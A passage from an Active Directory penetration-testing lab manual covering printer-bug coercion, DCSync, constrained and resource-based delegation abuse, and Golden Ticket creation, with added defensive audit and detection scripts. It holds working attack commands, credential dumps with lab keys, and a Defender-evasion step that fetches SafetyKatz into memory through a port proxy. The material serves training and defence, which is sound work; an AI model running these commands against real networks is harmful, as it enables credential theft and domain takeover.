| LSA Process is now R/W
| LUID 0 ; 69532048 (00000000:0424f990)
\_ msv1_0 - data copy @ 000001845BC37D30 : OK !
\_ kerberos - data copy @ 000001845BDB3298
\_ aes256_hmac OK
\_ aes128_hmac -> null
\_ rc4_hmac_nt -> null
\_ rc4_hmac_old -> null
\_ rc4_md4 -> null
\_ rc4_hmac_nt_exp -> null
\_ rc4_hmac_old_exp -> null
\_ *Password replace @ 000001845BD10388 (32) -> null

mimikatz(commandline) # exit
Bye!
[snip]

In the newly spawned process, use Find-PSRemotingLocalAdminAccess after loading InvisiShell:

C:\Windows\system32>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
[snip]
PS C:\Windows\system32> cd C:\AD\Tools\
PS C:\AD\Tools> . C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
PS C:\AD\Tools> Find-PSRemotingLocalAdminAccess -Verbose
VERBOSE: Trying to run a command parallely on provided computers list using
PSRemoting .
US-Web
PS C:\AD\Tools> exit

Great! We have administrative access to us-web using webmaster's credentials. Now, we will use the
printer bug to force us-dc to connect to us-web. Let's first copy Rubeus.exe to us-web and start
monitoring for any authentication from us-dc.

We can use multiple methods to copy Rubeus, such as xcopy, PowerShell Remoting, etc.

Copy Rubeus using xcopy and execute using winrs


From the process running as webmaster:

C:\Windows\system32>echo F | xcopy C:\AD\Tools\Rubeus.exe \\us-web\C$\Users\Public\Rubeus.exe /Y
Does \\us-web\C$\Users\Public\Rubeus.exe specify a file name
or directory name on the target
(F = file, D = directory)? F
C:\AD\Tools\Rubeus.exe
1 File(s) copied
C:\Windows\system32>winrs -r:us-web cmd.exe
Microsoft Windows [Version 10.0.17763.1637]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\webmaster>C:\Users\Public\Rubeus.exe monitor /targetuser:US-DC$ /interval:5 /nowrap
C:\Users\Public\Rubeus.exe monitor /targetuser:US-DC$ /interval:5 /nowrap

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v1.6.1

[*] Action: TGT Monitoring


[*] Target user : US-DC$
[*] Monitoring every 5 seconds for new TGTs

Copy and execute Rubeus using PowerShell Remoting


From the process running as webmaster:

PS C:\AD\Tools> $usweb1 = New-PSSession us-web
PS C:\AD\Tools> Copy-Item -ToSession $usweb1 -Path C:\AD\Tools\Rubeus.exe -Destination C:\Users\Public
PS C:\AD\Tools> Enter-PSSession $usweb1
[us-web]: PS C:\Users\webmaster\Documents> cd C:\Users\Public
[us-web]: PS C:\Users\webmaster\Downloads> .\Rubeus.exe monitor
/targetuser:US-DC$ /interval:5 /nowrap

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v1.6.1

[*] Action: TGT Monitoring


[*] Target user : US-DC$
[*] Monitoring every 5 seconds for new TGTs

Using either of the above methods, once we have Rubeus running in the monitor mode, we can start
MS-RPRN.exe to force connect us-dc to us-web and thereby abuse the printer bug:

C:\Users\studentuserx>C:\AD\Tools\MS-RPRN.exe \\us-dc.us.techcorp.local \\us-web.us.techcorp.local
Attempted printer notification and received an invalid handle. The coerced
authentication probably worked!

On the session where Rubeus is running, we can see:

[snip]
[*] 1/14/2021 9:51:57 AM UTC - Found new TGT:

User : [email protected]
StartTime : 1/13/2021 8:08:07 PM
EndTime : 1/14/2021 6:07:42 AM
RenewTill : 12/31/1969 4:00:00 PM
Flags : name_canonicalize, pre_authent, forwarded,
forwardable
Base64EncodedTicket :

doIFKTCCBSWgAwIBBaEDAg
[snip]

Copy the Base64EncodedTicket, remove unnecessary spaces and newlines (if any), and use the ticket with
Rubeus on the Student VM.

PS C:\AD\Tools> C:\AD\Tools\Rubeus.exe ptt /ticket:TGTofUS-DC$


______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v1.6.1

[*] Action: Import Ticket
[+] Ticket successfully imported!

We can now run DCSync attack against US-DC using the injected ticket:

C:\Users\studentuserx>C:\AD\Tools\SharpKatz.exe --Command dcsync --User us\krbtgt
--Domain us.techcorp.local --DomainController us-dc.us.techcorp.local
[*]
[*] System Information
[*] ----------------------------------------------------------------------
[*] | Platform: Win32NT |
[*] ----------------------------------------------------------------------
[*] | Major: 10 | Minor: 0 | Build: 17763 |
[*] ----------------------------------------------------------------------
[*] | Version: Microsoft Windows NT 6.2.9200.0 |
[*] ----------------------------------------------------------------------
[*]
[!] us.techcorp.local will be the domain
[!] us-dc.us.techcorp.local will be the DC server
[!] us\krbtgt will be the user account
[*]
[*] Object RDN : krbtgt
[*]
[*] ** SAM ACCOUNT **
[*]
[*] SAM Username : krbtgt
[*] User Principal Name :
[*] Account Type : USER_OBJECT
[*] User Account Control : ACCOUNTDISABLE, NORMAL_ACCOUNT
[*] Account expiration : 12/31/9999 11:59:59 PM
[*] Password last change : 7/5/2019 12:49:17 AM
[*] Object Security ID : S-1-5-21-210670787-2521448726-163245708-502
[*] Object Relative ID : 502
[*]
[*] Credents:
[*] Hash NTLM : b0975ae49f441adc6b024ad238935af5
[*] ntlm- 0 : b0975ae49f441adc6b024ad238935af5
[*] lm - 0 : d765cfb668ed3b1f510b8c3861447173
[*]
[*] Supplemental Credents:
[*]
[*] * Primary:NTLM-Strong-NTOWF
[*] Random Value : 819a7c8674e0302cbeec32f3f7b226c9
[*]
[*] * Primary:Kerberos-Newer-Keys
[*] Default Salt :US.TECHCORP.LOCALkrbtgt

[*] Credents
[*] aes256_hmac 4096:
5e3d2096abb01469a3b0350962b0c65cedbbc611c5eac6f3ef6fc1ffa58cacd5
[*] aes128_hmac 4096: 1bae2a6639bb33bf720e2d50807bf2c1
[*] des_cbc_md5 4096: 923158b519f7a454
[*] ServiceCredents
[*] OldCredents
[*] OlderCredents
[snip]

We can run the DCSync attack using Invoke-Mimi or any other tool too.
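This hands-on chains three conditions that a defender can each measure: a non-DC computer trusted for unconstrained delegation, a Print Spooler reachable on the DC for the coercion, and privileged accounts whose TGTs may be delegated at all. The following PowerShell is an added audit, not part of the lab manual, that reports all three for the current domain. It assumes the ActiveDirectory module is loaded and Windows PowerShell 5.1 (Get-Service -ComputerName was removed in PowerShell 7, where Invoke-Command would be used instead); the well-known primaryGroupID values and group names are standard, the function names and Finding wording are my own.

```powershell
# Added audit, not from the lab manual. Assumes the ActiveDirectory module is loaded and Windows
# PowerShell 5.1. Querying remote service state normally needs administrative rights on the DCs.

function Get-UnconstrainedDelegationAudit {
    # TrustedForDelegation is the UAC bit behind "Trust this computer for delegation to any service".
    # primaryGroupID 516 = Domain Controllers, 521 = Read-only Domain Controllers: these carry the bit by design.
    Get-ADComputer -Filter { TrustedForDelegation -eq $true } -Properties primaryGroupID, OperatingSystem |
        ForEach-Object {
            $isDc = $_.primaryGroupID -in @(516, 521)
            $finding = if ($isDc) { 'expected: domain controller' } else {
                'REVIEW: non-DC caches forwardable TGTs of every principal that authenticates to it (us-web in this lab)'
            }
            [pscustomobject]@{
                Name               = $_.Name
                DNSHostName        = $_.DNSHostName
                OperatingSystem    = $_.OperatingSystem
                IsDomainController = $isDc
                Finding            = $finding
            }
        }
}

function Get-DcSpoolerStatus {
    # The MS-RPRN coercion used above needs the Print Spooler service running on the DC.
    foreach ($dc in Get-ADDomainController -Filter *) {
        $svc = Get-Service -Name Spooler -ComputerName $dc.HostName -ErrorAction SilentlyContinue
        if (-not $svc)                       { $finding = 'could not query service state' }
        elseif ($svc.Status -eq 'Running')   { $finding = 'REVIEW: Print Spooler running on a domain controller' }
        else                                 { $finding = 'ok: Print Spooler not running' }
        [pscustomobject]@{
            DomainController = $dc.HostName
            SpoolerStatus    = if ($svc) { [string]$svc.Status }    else { 'unknown' }
            StartType        = if ($svc) { [string]$svc.StartType } else { 'unknown' }
            Finding          = $finding
        }
    }
}

function Get-PrivilegedDelegationExposure {
    # Tier-0 users should be in Protected Users or marked "Account is sensitive and cannot be delegated",
    # so that a TGT captured on an unconstrained-delegation host cannot be used on their behalf.
    $protectedUsersDn = (Get-ADGroup -Identity 'Protected Users').DistinguishedName
    Get-ADGroupMember -Identity 'Domain Admins' -Recursive |
        Where-Object { $_.objectClass -eq 'user' } |
        Get-ADUser -Properties AccountNotDelegated, MemberOf |
        ForEach-Object {
            $inProtectedUsers = $_.MemberOf -contains $protectedUsersDn
            $finding = if ($_.AccountNotDelegated -or $inProtectedUsers) { 'ok' } else {
                'REVIEW: privileged user whose TGT can be delegated'
            }
            [pscustomobject]@{
                User                = $_.SamAccountName
                AccountNotDelegated = [bool]$_.AccountNotDelegated
                InProtectedUsers    = $inProtectedUsers
                Finding             = $finding
            }
        }
}

Get-UnconstrainedDelegationAudit | Format-Table Name, IsDomainController, Finding -AutoSize
Get-DcSpoolerStatus              | Format-Table -AutoSize
Get-PrivilegedDelegationExposure | Format-Table -AutoSize
```

Note that the third check does not help against the exact path shown here, where the coerced principal is the DC's machine account; for that, stopping and disabling the Spooler on domain controllers and removing unconstrained delegation from member servers (switching them to constrained or resource-based delegation) are the controls that matter.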

Hands-On 12:
Task
• Abuse Constrained delegation in us.techcorp.local to escalate privileges on a machine to Domain
Admin.

Solution
Enumerate the objects in our current domain that have constrained delegation enabled with the help of
the Active Directory module from InvisiShell:

PS C:\AD\Tools> Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo

DistinguishedName : CN=appsvc,CN=Users,DC=us,DC=techcorp,DC=local
msDS-AllowedToDelegateTo : {CIFS/us-mssql.us.techcorp.local, CIFS/us-mssql}
Name : appsvc
ObjectClass : user
ObjectGUID : 792eeddd-5d62-4b4f-bff7-23475d665474

Recall that we extracted the credentials of appsvc from us-jump. Let's use the AES256 keys of appsvc to
impersonate the domain administrator (administrator) and access us-mssql with those privileges. Note
that we request an alternate ticket for the HTTP service to be able to use WinRM.

C:\Users\studentuserx>C:\AD\Tools\Rubeus.exe s4u /user:appsvc
/aes256:b4cb0430da8176ec6eae2002dfa86a8c6742e5a88448f1c2d6afc3781e114335
/impersonateuser:administrator /msdsspn:CIFS/us-mssql.us.techcorp.local
/altservice:HTTP /domain:us.techcorp.local /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v1.6.1

[*] Action: S4U

[*] Using aes256_cts_hmac_sha1 hash: b4cb0430da8176ec6eae2002dfa86a8c6742e5a88448f1c2d6afc3781e114335
[*] Building AS-REQ (w/ preauth) for: 'us.techcorp.local\appsvc'
[+] TGT request successful!
[*] base64(ticket.kirbi):
[snip]
[*] Action: S4U

[*] Using domain controller: US-DC.us.techcorp.local (192.168.1.2)
[*] Building S4U2self request for: '[email protected]'
[*] Sending S4U2self request
[+] S4U2self success!
[*] Got a TGS for 'administrator' to '[email protected]'
[*] base64(ticket.kirbi):
[snip]
[+] Ticket successfully imported!

Check if the ticket is present in the current process:

C:\Users\studentuserx>klist

Current LogonId is 0:0x1575a8a

Cached Tickets: (1)

#0>     Client: administrator @ US.TECHCORP.LOCAL
        Server: HTTP/us-mssql.us.techcorp.local @ US.TECHCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40210000 -> forwardable pre_authent name_canonicalize
Start Time: 1/14/2021 4:00:25 (local)
End Time: 1/14/2021 14:00:25 (local)
Renew Time: 0
Session Key Type: AES-128-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:

Sweet, let's access us-mssql using winrs. Note that we will have privileges of domain administrator but
that is only limited to us-mssql:

C:\Users\studentuserx>winrs -r:us-mssql.us.techcorp.local cmd.exe


Microsoft Windows [Version 10.0.17763.1637]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\administrator.US>whoami
whoami
us\administrator
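Two things made this hands-on work: appsvc is allowed to use any authentication protocol (protocol transition), so S4U2self can mint a ticket for administrator without administrator ever authenticating, and the service name in a ticket is not protected, so a CIFS delegation target is really a whole-host target (HTTP above). The following PowerShell is an added audit and detection example, not part of the lab manual. The first function lists every constrained-delegation account with those two properties; the second searches a domain controller's Security log for event 4769 entries whose TransmittedServices field is populated, which is how an S4U2proxy request shows up. It assumes the ActiveDirectory module is loaded and that Kerberos service ticket auditing is enabled on the DC queried; the UAC bit value and 4769 field names are standard, the function names and Finding wording are my own.

```powershell
# Added audit and detection, not from the lab manual. Assumes the ActiveDirectory module is loaded;
# the event search must run on, or with -ComputerName against, a domain controller that audits
# Kerberos service ticket operations (Security event 4769). Field names are the standard 4769 ones.

function Get-ConstrainedDelegationAudit {
    # msDS-AllowedToDelegateTo lists the target SPNs; UAC bit 0x1000000 (TRUSTED_TO_AUTH_FOR_DELEGATION)
    # is "Use any authentication protocol", which allows S4U2self for arbitrary users, as with appsvc above.
    $adArgs = @{
        LDAPFilter = '(msDS-AllowedToDelegateTo=*)'
        Properties = 'msDS-AllowedToDelegateTo', 'userAccountControl', 'sAMAccountName', 'objectClass'
    }
    Get-ADObject @adArgs | ForEach-Object {
        $obj = $_
        $protocolTransition = (([int]$obj.userAccountControl) -band 0x1000000) -ne 0
        $targets = @($obj.'msDS-AllowedToDelegateTo')
        # The service class in a ticket is not protected, so the exposure is every service on each
        # target host, not only the listed SPN. Report the distinct hosts for that reason.
        $hosts = @($targets | ForEach-Object { ($_ -split '/')[1] } | Sort-Object -Unique)
        $finding = if ($protocolTransition) {
            'REVIEW: protocol transition enabled; tickets for any non-protected user to the target hosts can be obtained without that user'
        } else { 'ok: Kerberos-only constrained delegation; a forwardable ticket from the user is required' }
        [pscustomobject]@{
            Account            = $obj.sAMAccountName
            Class              = $obj.objectClass
            ProtocolTransition = $protocolTransition
            TargetSpns         = $targets -join ', '
            TargetHosts        = $hosts -join ', '
            Finding            = $finding
        }
    }
}

function Find-S4UProxyTickets {
    param(
        [string]$ComputerName = $env:COMPUTERNAME,   # a domain controller
        [int]$Hours = 24
    )
    $filter = @{ LogName = 'Security'; Id = 4769; StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -ComputerName $ComputerName -FilterHashtable $filter -ErrorAction SilentlyContinue |
        ForEach-Object {
            $data = @{}
            foreach ($d in ([xml]$_.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
            # TransmittedServices is '-' for an ordinary TGS-REQ and names the delegating account for S4U2proxy.
            $transited = $data['TransmittedServices']
            if ([string]::IsNullOrWhiteSpace($transited) -or $transited -eq '-') { return }
            [pscustomobject]@{
                Time              = $_.TimeCreated
                ImpersonatedUser  = $data['TargetUserName']
                RequestedService  = $data['ServiceName']
                DelegatingAccount = $transited
                ClientAddress     = $data['IpAddress']
                Status            = $data['Status']
            }
        }
}

Get-ConstrainedDelegationAudit | Format-List
Find-S4UProxyTickets | Format-Table -AutoSize
```

In this lab the audit reports appsvc with protocol transition enabled and us-mssql as the target host, and the DC log shows a 4769 for administrator to a us-mssql service with appsvc in TransmittedServices. Neither S4U2self nor S4U2proxy can be performed for members of Protected Users or for accounts marked "Account is sensitive and cannot be delegated", so keeping Domain Admins in that group is the resource-independent mitigation; reviewing every account that has protocol transition is the other.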

Hands-On 13:
Task
• Find a computer object in US domain where we have Write permissions.
• Abuse the Write permissions to access that computer as Domain Admin.
• Extract secrets from that machine for users and hunt for local admin privileges for the users.

Solution
We have already enumerated ACLs for studentuserx and the studentusers group. Recall that we have admin access to us-mgmt (we added studentuserx to the machineadmins group) but we never extracted credentials from that machine. Let's do that now:

C:\AD\Tools>echo F | xcopy C:\AD\Tools\Loader.exe \\us-mgmt\C$\Users\Public\Loader.exe /Y
Does \\us-mgmt\C$\Users\Public\Loader.exe specify a file name
or directory name on the target
(F = file, D = directory)? F
C:\AD\Tools\Loader.exe
1 File(s) copied

Add a netsh port proxy (so that the download comes from 127.0.0.1 and is not inspected by Defender), run Loader.exe and load SafetyKatz in memory to extract credentials:

C:\AD\Tools>winrs -r:us-mgmt cmd
Microsoft Windows [Version 10.0.17763.1637]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\studentuserx>netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=192.168.100.x
C:\Users\studentuserx>C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe
[snip]

mimikatz # sekurlsa::keys

[snip]
Authentication Id : 0 ; 8035962 (00000000:007a9e7a)
Session : RemoteInteractive from 2
User Name : mgmtadmin
Domain : US
Logon Server : US-DC
Logon Time : 1/7/2021 10:41:05 PM
SID : S-1-5-21-210670787-2521448726-163245708-1115

* Username : mgmtadmin
* Domain : US.TECHCORP.LOCAL
* Password : (null)



* Key List :
aes256_hmac
32827622ac4357bcb476ed3ae362f9d3e7d27e292eb27519d2b8b419db24c00f
rc4_hmac_nt e53153fc2dc8d4c5a5839e46220717e5
rc4_hmac_old e53153fc2dc8d4c5a5839e46220717e5
rc4_md4 e53153fc2dc8d4c5a5839e46220717e5
rc4_hmac_nt_exp e53153fc2dc8d4c5a5839e46220717e5
rc4_hmac_old_exp e53153fc2dc8d4c5a5839e46220717e5
[snip]

Now, let's check whether there are any interesting ACLs for mgmtadmin. Recall that our methodology is cyclic: ideally, we run the full set of enumeration for every user we compromise. Load PowerView after running InvisiShell. Note that the command below may take some time to complete:

PS C:\AD\Tools> . C:\AD\Tools\PowerView.ps1
PS C:\AD\Tools> Find-InterestingDomainAcl -ResolveGUIDs |
?{$_.IdentityReferenceName -match 'mgmtadmin'}

ObjectDN : CN=US-HELPDESK,CN=Computers,DC=us,DC=techcorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : ListChildren, ReadProperty, GenericWrite
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-210670787-2521448726-163245708-1115
IdentityReferenceName : mgmtadmin
IdentityReferenceDomain : us.techcorp.local
IdentityReferenceDN : CN=mgmtadmin,CN=Users,DC=us,DC=techcorp,DC=local
IdentityReferenceClass : user

Sweet! With GenericWrite on us-helpdesk, we can configure Resource-based Constrained Delegation (RBCD) on us-helpdesk so that it trusts our own student VM. We use the student VM's computer object rather than studentuserx because the principal that delegates needs an SPN for RBCD.

Start a process with the privileges of mgmtadmin. Run the below command from an elevated shell:

C:\Windows\system32> C:\AD\Tools\SafetyKatz.exe "sekurlsa::opassth /user:mgmtadmin /domain:us.techcorp.local /aes256:32827622ac4357bcb476ed3ae362f9d3e7d27e292eb27519d2b8b419db24c00f /run:cmd.exe" "exit"
[snip]



In the new process, use the Active Directory module to set RBCD on us-helpdesk for the student VMs. Note that we add all student VMs of the current lab instance at once, because the attribute holds a single list that would otherwise be overwritten by each student:

C:\Windows\system32>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
[snip]
PS C:\Windows\system32> Import-Module C:\AD\Tools\ADModule-master\Microsoft.ActiveDirectory.Management.dll
PS C:\Windows\system32> Import-Module C:\AD\Tools\ADModule-master\ActiveDirectory\ActiveDirectory.psd1
PS C:\Windows\system32> $comps = 'student1$','student11$','student12$','student13$','student14$','student15$','student16$','student17$','student18$','student19$','student20$','student21$','student22$','student23$','student24$','student25$','student26$','student27$','student28$','student29$','student30$'
PS C:\AD\Tools> Set-ADComputer -Identity us-helpdesk -PrincipalsAllowedToDelegateToAccount $comps -Verbose
VERBOSE: Performing the operation "Set" on target "CN=US-HELPDESK,CN=Computers,DC=us,DC=techcorp,DC=local".
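From the defender's side, the path just walked leaves two footprints worth auditing: a write-capable ACE on a computer object held by an ordinary user, and a change to the computer's msDS-AllowedToActOnBehalfOfOtherIdentity attribute (which is what Set-ADComputer -PrincipalsAllowedToDelegateToAccount writes). The following is an added example, not part of the course material; the ACE records and the event 5136 ("A directory service object was modified") records are constructed to mirror the PowerView output above and the Windows event fields, and svc-provision is a hypothetical automation account.

```python
"""Two defensive checks for the RBCD path: audit write-capable ACEs on
computer objects, and detect changes to the RBCD attribute via event 5136.

Added example, not the course's code. Records are constructed to mirror
PowerView's ACE output and the fields of Windows event 5136.
"""

# Rights that let a principal rewrite a computer object's attributes or its
# security descriptor, and hence configure RBCD on it.
WRITE_RIGHTS = {"GenericAll", "GenericWrite", "WriteDacl", "WriteOwner", "WriteProperty"}

# Identities expected to hold such rights (assumption: tune per environment).
PRIVILEGED = {"Domain Admins", "Enterprise Admins", "Administrators", "SYSTEM"}

RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"
VALUE_ADDED = "%%14674"  # OperationType code for "value added" in event 5136


def risky_computer_aces(aces):
    """Return (identity, object DN, rights) for allow ACEs on computer objects
    that grant write-capable rights to an identity outside PRIVILEGED."""
    findings = []
    for ace in aces:
        if ace["AceQualifier"] != "AccessAllowed" or ace["ObjectClass"] != "computer":
            continue
        rights = {r.strip() for r in ace["ActiveDirectoryRights"].split(",")}
        hit = rights & WRITE_RIGHTS
        if hit and ace["IdentityReferenceName"] not in PRIVILEGED:
            findings.append((ace["IdentityReferenceName"], ace["ObjectDN"], sorted(hit)))
    return findings


def rbcd_changes(events, approved_writers=frozenset()):
    """Return 5136 events that add a value to the RBCD attribute of an object,
    unless the writer is an approved account. Event 5136 requires the
    'Directory Service Changes' audit subcategory and a SACL on the objects."""
    alerts = []
    for ev in events:
        if ev["EventID"] != 5136 or ev["OperationType"] != VALUE_ADDED:
            continue
        if ev["AttributeLDAPDisplayName"].lower() != RBCD_ATTR.lower():
            continue
        if ev["SubjectUserName"] in approved_writers:
            continue
        alerts.append({"writer": ev["SubjectUserName"], "target": ev["ObjectDN"]})
    return alerts


HELPDESK_DN = "CN=US-HELPDESK,CN=Computers,DC=us,DC=techcorp,DC=local"

# Constructed ACEs: the mgmtadmin entry mirrors the PowerView result above.
SAMPLE_ACES = [
    {"ObjectDN": HELPDESK_DN, "ObjectClass": "computer", "AceQualifier": "AccessAllowed",
     "ActiveDirectoryRights": "ListChildren, ReadProperty, GenericWrite",
     "IdentityReferenceName": "mgmtadmin"},
    {"ObjectDN": HELPDESK_DN, "ObjectClass": "computer", "AceQualifier": "AccessAllowed",
     "ActiveDirectoryRights": "GenericAll", "IdentityReferenceName": "Domain Admins"},
    {"ObjectDN": HELPDESK_DN, "ObjectClass": "computer", "AceQualifier": "AccessAllowed",
     "ActiveDirectoryRights": "ReadProperty", "IdentityReferenceName": "studentuserx"},
]

# Constructed 5136 events: an RBCD write by mgmtadmin, an unrelated attribute
# change, and an RBCD write by the hypothetical provisioning account.
SAMPLE_EVENTS = [
    {"EventID": 5136, "SubjectUserName": "mgmtadmin", "ObjectDN": HELPDESK_DN,
     "AttributeLDAPDisplayName": RBCD_ATTR, "OperationType": VALUE_ADDED},
    {"EventID": 5136, "SubjectUserName": "mgmtadmin", "ObjectDN": HELPDESK_DN,
     "AttributeLDAPDisplayName": "description", "OperationType": VALUE_ADDED},
    {"EventID": 5136, "SubjectUserName": "svc-provision", "ObjectDN": HELPDESK_DN,
     "AttributeLDAPDisplayName": RBCD_ATTR, "OperationType": VALUE_ADDED},
]

if __name__ == "__main__":
    for identity, dn, rights in risky_computer_aces(SAMPLE_ACES):
        print(f"[ACL]  {identity} holds {','.join(rights)} on {dn}")
    for alert in rbcd_changes(SAMPLE_EVENTS, approved_writers={"svc-provision"}):
        print(f"[5136] {alert['writer']} changed RBCD on {alert['target']}")
```

The ACE audit is the proactive half (it would have reported mgmtadmin's GenericWrite before anyone abused it); the 5136 check is the reactive half and only works if directory-service change auditing and a SACL on computer objects are in place.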

Now we need the AES key of the student VM's computer account to use its identity. Run mimikatz on your own studentx machine from a command prompt with administrative privileges (Run as administrator) using the command below. Note that several logon sessions of studentx$ will show different AES keys; use the one for SID S-1-5-18, the well-known SID of the SYSTEM account:

C:\Windows\system32>C:\AD\Tools\SafetyKatz.exe -Command "sekurlsa::keys" "exit"
[snip]
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : STUDENTx$
Domain : US
Logon Server : (null)
Logon Time : 1/9/2021 5:40:53 AM
SID : S-1-5-18

* Username : studentx$
* Domain : US.TECHCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac
3845eac1016c33077d3619b3f931168db1343a223f3d7f9fc4424c77f8383578
rc4_hmac_nt 3b5c12f380c5c7b142356e941a5cefa2
rc4_hmac_old 3b5c12f380c5c7b142356e941a5cefa2
rc4_md4 3b5c12f380c5c7b142356e941a5cefa2
rc4_hmac_nt_exp 3b5c12f380c5c7b142356e941a5cefa2
rc4_hmac_old_exp 3b5c12f380c5c7b142356e941a5cefa2



Use the AES key of studentx$ with Rubeus to request a TGS for the HTTP SPN of us-helpdesk, impersonating administrator:

C:\AD\Tools>C:\AD\Tools\Rubeus.exe s4u /user:studentx$ /aes256:3845eac1016c33077d3619b3f931168db1343a223f3d7f9fc4424c77f8383578 /msdsspn:http/us-helpdesk /impersonateuser:administrator /ptt
[snip]
[*] Action: Import Ticket
[+] Ticket successfully imported!
[snip]

Let's use the HTTP TGS to access us-helpdesk as the Domain Administrator (administrator). Run the below commands in the process where we injected the TGS above:

PS C:\AD\Tools> klist
Current LogonId is 0:0x426960a

Cached Tickets: (1)

#0> Client: administrator @ US.TECHCORP.LOCAL
Server: http/us-helpdesk @ US.TECHCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40210000 -> forwardable pre_authent name_canonicalize
Start Time: 1/14/2021 5:42:03 (local)
End Time: 1/14/2021 15:42:03 (local)
Renew Time: 0
Session Key Type: AES-128-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:

C:\AD\Tools>winrs -r:us-helpdesk cmd
Microsoft Windows [Version 10.0.17763.557]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\Administrator.US>whoami
whoami
us\administrator

Now, to copy our loader to us-helpdesk we need access to its filesystem. Let's request a TGS for the CIFS SPN with Rubeus in the same process as above:

C:\AD\Tools>C:\AD\Tools\Rubeus.exe s4u /user:studentx$ /aes256:3845eac1016c33077d3619b3f931168db1343a223f3d7f9fc4424c77f8383578 /msdsspn:cifs/us-helpdesk /impersonateuser:administrator /ptt
[snip]



Now copy the loader, add the port redirection and run SafetyKatz on us-helpdesk to extract credentials from LSASS:

C:\AD\Tools>echo F | xcopy C:\AD\Tools\Loader.exe \\us-helpdesk\C$\Users\Public\Loader.exe /Y
[snip]

C:\AD\Tools>winrs -r:us-helpdesk cmd
Microsoft Windows [Version 10.0.17763.557]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\Administrator.US>netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=192.168.100.x
C:\Users\Administrator.US> C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe
[snip]
Authentication Id : 0 ; 6672278 (00000000:0065cf96)
Session : RemoteInteractive from 2
User Name : helpdeskadmin
Domain : US
Logon Server : US-DC
Logon Time : 1/7/2021 10:34:05 PM
SID : S-1-5-21-210670787-2521448726-163245708-1120

* Username : helpdeskadmin
* Domain : US.TECHCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac
f3ac0c70b3fdb36f25c0d5c9cc552fe9f94c39b705c4088a2bb7219ae9fb6534
rc4_hmac_nt 94b4a7961bb45377f6e7951b0d8630be
rc4_hmac_old 94b4a7961bb45377f6e7951b0d8630be
rc4_md4 94b4a7961bb45377f6e7951b0d8630be
rc4_hmac_nt_exp 94b4a7961bb45377f6e7951b0d8630be
rc4_hmac_old_exp 94b4a7961bb45377f6e7951b0d8630be
[snip]

Reuse the AES key of helpdeskadmin with OverPass-the-hash and use Find-PSRemotingLocalAdminAccess to hunt for local admin privileges. Run the OverPass-the-hash command from an elevated shell:

C:\Windows\System32> C:\AD\Tools\SafetyKatz.exe "sekurlsa::opassth /user:helpdeskadmin /domain:us.techcorp.local /aes256:f3ac0c70b3fdb36f25c0d5c9cc552fe9f94c39b705c4088a2bb7219ae9fb6534 /run:cmd.exe" "exit"
[snip]



In the new process:

C:\Windows\system32>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
[snip]
PS C:\Windows\system32> . C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
PS C:\Windows\system32> Find-PSRemotingLocalAdminAccess -Verbose
VERBOSE: Trying to run a command parallely on provided computers list using PSRemoting .
US-HelpDesk
US-ADConnect

So, helpdeskadmin has administrative privileges on us-adconnect too!



Hands-On 14:
Task
• Using the NTLM hash or AES key of krbtgt account of us.techcorp.local, create a Golden ticket.
• Use the Golden ticket to (once again) get domain admin privileges from a machine.

Solution
In a previous hands-on we obtained domain admin privileges (we abused the printer bug on us-web, which has unconstrained delegation, and ran a DCSync attack). Let's use the AES key of the krbtgt account to create a Golden ticket.

Without using Invoke-Mimi.ps1

Run the below from an elevated shell:

C:\Windows\system32>C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden
/User:Administrator /domain:us.techcorp.local /sid:S-1-5-21-210670787-
2521448726-163245708
/aes256:5e3d2096abb01469a3b0350962b0c65cedbbc611c5eac6f3ef6fc1ffa58cacd5
/startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
[snip]
User : Administrator
Domain : us.techcorp.local (US)
SID : S-1-5-21-210670787-2521448726-163245708
User Id : 500
Groups Id : *513 512 520 518 519
